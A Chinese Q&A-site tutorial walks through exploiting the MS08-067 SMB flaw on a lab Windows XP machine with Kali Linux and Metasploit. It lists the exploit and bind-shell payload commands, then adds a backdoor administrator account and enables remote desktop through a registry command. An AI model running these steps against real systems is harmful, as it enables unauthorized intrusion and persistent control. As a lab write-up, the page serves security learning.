当前位置:酷酷问答>百科问答>kalilinux攻击漏洞MS08_067

kalilinux攻击漏洞MS08_067

2024-09-04 19:54:17 编辑:zane 浏览量:597

kalilinux攻击漏洞MS08_067

的有关信息介绍如下:

kalilinux攻击漏洞MS08_067

在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境,kalilinux:192.168.116.3 winxp 192.168.116.116 要做的就是用Kali Linux里的Metasploit入侵WinXP

在Kali用命令 msfconsole 开启Metasploit (在终端里输入msfconsole)

然后运行命令:use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序

set LHOST 192.168.116.3 #设置本地主机IP

set RHOST 192.168.116.116 #设置目标主机IP

set payload windows/shell_bind_tcp #设置payload

show options#查看设置信息

exploit#实施攻击

攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。

添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

有了目标主机的cmdshell你想做什么不行吧?

好了演示到此完毕!

版权声明:文章由 酷酷问答 整理收集,来源于互联网或者用户投稿,如有侵权,请联系我们,我们会立即处理。如转载请保留本文链接:https://www.kukuwd.com/answer/22673.html
热门文章